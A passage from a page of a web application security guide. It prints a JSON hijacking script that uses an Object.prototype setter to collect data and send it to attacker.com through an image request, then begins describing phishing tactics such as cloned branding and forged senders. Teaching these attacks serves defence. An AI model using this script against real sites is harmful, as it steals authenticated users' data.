Web application security - the fast guide 1.1 | Page 103
Chapter 5 - Attack Execution the client
P a g e | 103
The victim opens the link that sends request to attacker website containing a
page with the following script
Object.prototype.__defineSetter__("name", function(x) {
var s = "";
for (f in this) {
s += f + ": '" + this[f] + "', ";
}
s += "name: " + x;
// send information to the attacker's server
document.images[0].src="http://attacker.com/?data=" + s;
});
The previous listing will define a setter and enable the sending of the
information requested by the browser to the attacker server.
This attack will be valid if the user is authenticated through a cookie to the
server containing the JSON service.
5.15 Attack Execute- Phishing
BRAND
Phishing go under the category of trickery type of attacks it depends mainly on
faking a representation of website or impersonating the company through a mail
message.
Attacker usually uses the original company theme and logo images to convince
the victim that the message is coming from legitimate company email.
To avoid being caught the attacker uses a compromised machine and a forged
email address.
Attack requirement:
A. vict